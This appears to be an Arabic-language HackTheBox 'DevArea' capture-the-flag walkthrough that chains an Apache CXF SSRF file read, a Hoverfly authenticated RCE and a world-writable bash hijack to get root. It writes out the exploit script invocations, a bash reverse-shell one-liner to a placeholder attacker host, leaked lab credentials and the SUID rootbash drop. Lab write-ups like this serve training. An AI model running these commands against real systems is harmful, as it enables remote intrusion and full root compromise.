
HackTheBox DevArea walkthrough chaining CVE-2022-46364 Apache CXF SSRF، CVE-2025-54123 Hoverfly RCE، وSUID bash hijacking لتصعيد الصلاحيات إلى root.
المنصة: HackTheBox نظام التشغيل: Linux الحالة: متقاعد — تم نشر الشرح الكامل.
الشرح الكامل: l3dsec.com/walkthroughs/devarea-htb
nmap → 21 (FTP anon) + 80 + 8080 (Jetty) + 8888 (Hoverfly)
→ FTP anon → employee-service.jar (Apache CXF, pre-3.5.5)
→ CVE-2022-46364 SSRF → file:///etc/systemd/system/hoverfly.service
→ admin credentials in ExecStart
→ CVE-2025-54123 Hoverfly RCE → shell as dev_ryan → user flag
→ /usr/bin/bash world-writable + sudo syswatch.sh calls it
→ bash hijack → SUID rootbash → root flag
nmap -sC -sV -p- <TARGET_IP>
# 21/tcp open ftp vsftpd 3.0.5 (anonymous login)
# 8080/tcp open http Jetty 9.4.27
# 8888/tcp open http Hoverfly Dashboard
تنزيل FTP anon من pub/ يُنتج employee-service.jar — خدمة Apache CXF SOAP، إصدار مُضمَّن أقدم من 3.5.5.
CXF قبل 3.5.5 يعكس عناوين URL الخاصة بـ XOP:Include من جانب الخادم — قراءة ملفات عشوائية عبر file://.
python3 CVE-2022-46364.py -t http://devarea.htb:8080/employeeservice -s file:///etc/systemd/system/hoverfly.service -d devarea.htb
# ExecStart: hoverfly -add -username admin -password O7IJ27MyyXiU
# User=dev_ryan
Hoverfly 1.11.3 — تنفيذ أوامر عن بُعد مُصادَق عليه عبر حقن إعدادات middleware.
nc -lvnp 4444
./CVE-2025-54123.sh -t http://<TARGET_IP>:8888 -u admin -p O7IJ27MyyXiU -c "bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1"
Shell باسم dev_ryan. علم المستخدم في /home/dev_ryan/user.txt.
sudo -l
# (root) NOPASSWD: /opt/syswatch/syswatch.sh
ls -la /usr/bin/bash
# -rwxrwxrwx (world-writable)
syswatch.sh يستدعي /usr/bin/bash داخليًا. استبدله بسكربت يُسقط SUID:
cp /usr/bin/bash /tmp/bash.bak
printf '#!/tmp/bash.bak\ncp /tmp/bash.bak /tmp/rootbash\nchmod 4755 /tmp/rootbash\n' > /usr/bin/bash
chmod +x /usr/bin/bash
sudo /opt/syswatch/syswatch.sh status
/tmp/rootbash -p
# euid=0(root)
علم الروت في /root/root.txt.
| العلم | القيمة |
|---|---|
| User | redacted |
| Root | redacted |
لأغراض تعليمية فقط. اختبر فقط الأنظمة التي تملكها أو لديك إذن كتابي صريح باختبارها.